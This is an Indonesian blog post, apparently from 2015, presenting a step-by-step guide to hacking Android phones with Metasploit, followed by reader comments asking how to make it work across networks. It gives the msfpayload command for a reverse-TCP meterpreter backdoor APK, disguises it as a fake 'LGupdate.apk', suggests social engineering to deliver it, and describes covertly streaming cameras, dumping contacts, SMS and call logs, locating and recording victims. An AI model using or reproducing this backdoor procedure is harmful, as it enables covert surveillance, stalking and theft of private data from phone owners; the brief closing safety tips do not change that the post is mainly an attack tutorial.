Learning Pentesting 4: Hacking Android dengan Metasploit

Android. Seperti layaknya Operating System lainnya, juga bisa dieksploitasi (baca: di-hack).

Tidak ada yang spesial dari tulisan kali ini, sekedar mengisi waktu luang di sela “clinic time”, sekaligus melunasi permintaan dari beberapa teman untuk hacking  dengan target android.

Lab yang dibuat untuk percobaan kali ini sebagai berikut:

1. Attacker: Kali Linux 1.09a Persistence USB dijalankan pada netbook Asus eeePC seashell 1015PX

2. Victim: Android JellyBean (Sony Xperia M dual), Android KitKat (LG G3)

3. ISP: telkomsel flash ultima. Dibagi dengan android wifi tethering (LG G3)

4. Metasploit framework: Exploit: exploit/multi/handler; payload: android/meterpreter/reverse_tcp

Langkah:

1. Buat dulu payloadnya (backdoor) dengan perintah seperti berikut di bawah

msfpayload android/meterpreter/reverse_tcp lhost=nomorIP lport=nomorPort R > namaaplikasi.apk

Screenshot from 2015-07-27 09:55:06

Screenshot from 2015-07-27 09:57:15

LGupdate.apk sebelum ditransfer

2. Transfer file backdoornya ke target. Setelah perintah di atas dijalankan, maka pada kasus saya akan tercipta file apk dengan nama LGupdate.apk Selanjutnya tinggal bagaimana file tersebut bisa sampai ke smartphone android victim. (you could always try soceng).

Screenshot_2015-07-27-11-41-34

LGupdate.apk di HP victim

3. Install file apk di smartphone victim. File apk yang diinstall akan berubah nama menjadi MainActivity. Saat di-tap maka penampakan yang muncul di smartphone target kurang lebihnya seperti berikut:

Screenshot_2015-07-27-11-41-474. Siapkan Modul Exploit.  Ketikkan msfconsole pada terminal diikuti dengan perintah seperti berikut:

Screenshot from 2015-07-27 10:33:18Pada percobaan eksploitasi saya di beberapa kesempatan awal sempat gagal dan keluar output error message –> meterpreter session closed. Reason: Died.

Jika tercipta koneksi, maka akan muncul pesan “meterpreter session opened” dan… Bingo!!! Konsol msf > akan berubah menjadi konsol meterpreter >

Lantas apa saja yang bisa kita lakukan dengan meng-hack android dari metasploit? Ada banyak. Bahkan lebih banyak daripada menghack distro linux lainnya.

1. Webcam Snap dan Webcam Stream. Kita bisa mengeksploitasi kamera depan dan kamera belakang pada smartphone target. Hebatnya lagi, beda dengan proses snapping dan streaming camera di netbook atau notebook, di smartphone android benar-benar stealth karena tidak ada lampu indikator yang menyala saat kamera sedang aktif dan juga tidak terjadi apa-apa pada layar target. Fitur ini sangat berbahaya.

Screenshot from 2015-07-27 12:01:18

webcam_snap pada kamera depan

Screenshot from 2015-07-27 12:30:49

webcam_stream pada kamera belakang

Pada saat melakukan streaming camera, halaman browser akan terbuka dan proses paparazzi akan terus berjalan sampai dihentikan manual. Baik kamera depan maupun kamera belakang bisa dipilih mana saja yang diinginkan.

2. Dump call log, sms & contact. Hal berbahaya lainnya adalah hacker bisa mengakses data credential kita seperti berikut.

Screenshot from 2015-07-27 11:57:10Hasil dumpingnya juga sangat memuaskan. Semua contact akan muncul, dan urutannya sesuai dengan urutan kita memasukkan contact.

Screenshot from 2015-07-27 13:20:36e

call log dump

Screenshot from 2015-07-27 13:19:05

Screenshot from 2015-07-27 13:17:16Selain dari proses dumping di atas, kita juga bisa mengetahui lokasi seseorang berdasarkan fitur geolocation dan kemudian mengecek mapping lokasi tersebut secara online… 🙂

3. Merekam suara victim. Kita dapat menyesuaikan waktu yang diinginkan saat proses perekaman. Hasilnya akan tersimpan dengan format ekstensi wav

voice recording

voice recording

Masih banyak metode post modul lainnya yang bisa dicoba, silakan bereksperimen dan mengeksplorasi. Good luck!!!

Pesan moralnya: Jangan pernah menginstall aplikasi android dari sumber yang tidak terpercaya, bahkan di google play store pun masih bisa ada celah keamanan seperti di atas. Pastikan menggunakan antivirus seperti avast, mcafee dsb. (walaupun juga tidak menjamin keamanan, setidaknya bisa sedikit memfilter koneksi). Minimalisir penggunaan transaksi online melalui smartphone android. Jangan coba-coba bawa smartphone ke kamar mandi 😛 Dan jangan menyimpan konten dewasa pribadi pada smartphone 😛

Tutorial sebelumnya:

Advertisements

31 comments on “Learning Pentesting 4: Hacking Android dengan Metasploit

  1. andrea bastard says:

    Kalo secara global/wan yang dipakai ip publiknya atau ip statiknya gan?

    • Pahami dulu gan terminologinya. Pasangannya salah itu.
      IP private dan IP public. IP static dan IP dynamic.

      Baik IP private maupun IP public masing2 juga bisa statis dan dinamis. Kalau sudah paham baru enak sy jelasinnya 😀

  2. Nur Hafidz says:

    gan ane pakai kali linux rolling
    tapi setelah backdoor generate
    ane kirim ke hp
    tapi “apl tidak terpasang”
    posisi OS android Jellybean 4.2

    di tunggu reply gan

  3. Kyo says:

    min, bgmana cara setting lhost dan lport beda jaringan tpi attacker tidak menggunakan modem. Hanya pake tetring hp?? tolong pencerahannya hehe

  4. Kyo says:

    Gan, mohon penjelasannya mengenai hack beda jaringan namun attacker tdk menggunakan router atau modem, melainkan tetring hp. Mohon pencerahannya..hehehe

  5. min, bgmana settingan bila attacker tidak menggunakan jaringan dari modem dan router, melainkan menggunakan jaringan tetring hp??

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s